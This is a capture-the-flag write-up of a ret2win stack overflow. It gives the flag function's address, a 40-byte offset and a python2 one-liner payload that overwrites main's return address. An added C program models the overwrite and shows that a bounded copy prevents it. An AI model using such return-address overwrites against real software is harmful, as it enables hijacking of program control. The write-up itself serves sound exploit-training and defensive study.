This is exactly the same as coffer-overflow-2 from redpwn-2020.
In this case the return address of main has to be replaced with the address of a function called flag (which prints the flag).
The flag function starts at this address:
0x00000000004011ce: push rbp
Using gdb, the distance between the start of the buffer and the return address of main on the stack was found to be 40 bytes (rbp + 8 bytes), so the input is 40 bytes of padding followed by the address of the flag function in little endian. This worked:
python2 -c "print 'A'*40 + '\xce\x11\x40\x00\x00\x00\x00\x00'" | ./pwn-intended-0x3
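
A model of the overwrite described above, as an added example that is not part of the original writeup: a 48-byte array stands in for main's frame, and OLD_RET and the saved rbp value are constructed. The same input redirects the return-address slot when the copy is unbounded and leaves it intact when the copy is limited to the 32 bytes below saved rbp.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FLAG_ADDR  0x4011ceULL  /* start of flag, from the writeup */
#define RET_OFFSET 40           /* buffer start -> return address, from the writeup */
#define RBP_OFFSET 32           /* saved rbp sits 8 bytes below the return address */
#define FRAME_SIZE 48           /* modelled region: locals + saved rbp + return address */
#define OLD_RET    0x401300ULL  /* constructed stand-in for main's real return address */

static void store_le64(unsigned char *p, uint64_t v) {
    for (int i = 0; i < 8; i++) p[i] = (unsigned char)(v >> (8 * i));
}

static uint64_t load_le64(const unsigned char *p) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++) v |= (uint64_t)p[i] << (8 * i);
    return v;
}

/* Same 48 bytes the python2 one-liner emits (minus print's newline). */
size_t build_input(unsigned char *out) {
    memset(out, 'A', RET_OFFSET);
    store_le64(out + RET_OFFSET, FLAG_ADDR);  /* least significant byte first */
    return RET_OFFSET + 8;
}

/* Copy input into a modelled frame, writing at most `limit` bytes,
 * and return the value left in the return-address slot. */
uint64_t ret_after_copy(const unsigned char *in, size_t len, size_t limit) {
    unsigned char frame[FRAME_SIZE] = {0};
    store_le64(frame + RBP_OFFSET, 0x7ffc00001000ULL); /* constructed saved rbp */
    store_le64(frame + RET_OFFSET, OLD_RET);
    if (len > limit) len = limit;           /* the bound an unchecked read lacks */
    if (len > FRAME_SIZE) len = FRAME_SIZE; /* keep the model itself in bounds */
    memcpy(frame, in, len);
    return load_le64(frame + RET_OFFSET);
}

int main(void) {
    unsigned char in[FRAME_SIZE];
    size_t n = build_input(in);
    printf("unbounded copy: ret = 0x%llx\n",
           (unsigned long long)ret_after_copy(in, n, FRAME_SIZE));
    printf("bounded to 32:  ret = 0x%llx\n",
           (unsigned long long)ret_after_copy(in, n, RBP_OFFSET));
    return 0;
}
```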